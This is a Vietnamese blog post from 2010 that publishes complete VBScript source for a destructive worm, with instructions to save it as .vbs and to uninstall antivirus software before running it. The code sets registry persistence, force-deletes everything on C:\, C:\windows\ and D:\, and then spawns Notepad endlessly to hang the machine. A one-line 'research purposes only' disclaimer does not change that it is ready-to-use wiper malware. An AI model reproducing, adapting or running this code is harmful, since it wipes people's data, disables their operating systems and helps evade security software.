MeNu

Thứ Ba, 16 tháng 11, 2010

Cách tạo 1 virus đơn giản.

Thấy nhiều bạn có hứng thú với worm nên hôm nay mình post cho các bạn xem code của 1 con worm format HDD đơn giản = VB.
Lưu ý: Cái này chỉ dùng cho mục đích nghiên cứu, nghiêm cấm các hành vi phá hoại.
Các bạn lưu với đuôi .vbs là ok.

msgbox"Die roai !" 'Cai nay co tac dung se tao 1 hop thong bao tren man hinh cua nan nha
On Error Resume Next
Set vip_xinh = Createobject("scripting.filesystemobject")
vip_xinh.copyfile wscript.scriptfullname,vip_xinh.GetSpecialFolder(0)& "\ vip_xinh.vbs"
Set vip_xinh2= CreateObject("WScript.Shell")
vip_xinh2.regwrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\die","wscript.exe "& vip_xinh.GetSpecialFolder(0)& "\ vip_xinh.vbs %"

On Error Resume Next
Const vic = "D:\"
Delvic
Sub Delvic()
Dim fso
Set fso = CreateObject("Scripting.FileSystemObject")
fso.DeleteFile vic & "*.*" , True
fso.DeleteFolder vic & "*" , True
End Sub

On Error Resume Next
Const vic1 = "C:\windows\"
Delvic1
Sub Delvic1()
Dim fso1
Set fso1 = CreateObject("Scripting.FileSystemObject")
fso1.DeleteFile vic1 & "*.*" , True
fso1.DeleteFolder vic1 & "*" , True
End Sub

On Error Resume Next
Const vic2 = "C:\"
Delvic2
Sub Delvic2()
Dim fso2
Set fso2 = CreateObject("Scripting.FileSystemObject")
fso2.DeleteFile vic2 & "*.*" , True
fso2.DeleteFolder vic2 & "*" , True
End Sub

On Error Resume Next
Set treomay= CreateObject("WScript.Shell")
Do
treomay.run "notepad",false
loop


Trước tiên bạn remove các phần mềm diệt virus và lưu nó với đuôi .vbs
Sau khi run, hiện tượng sẽ đc xảy ra. Cách cứu ổ cứng lúc đó là nhanh chóng rút điện nguồn.
Sau khi vào lại win (Có thể phải cài lại) Bạn vào thư mục C://Windows/ và xóa file vipxinh.vbs đi, à mà đã cài lại win thì cần quái gì xóa nữa nhỉ? Cái này ban đầu mình tưởng là hok bị Antivirus phát hiện (vì file dạng txt) nhưng thực ra nó vẫn bị phát hiện nên bạn phải remove các phần mềm diệt virus đi còn với chú BKAV thì vô tư.

Không có nhận xét nào:

Đăng nhận xét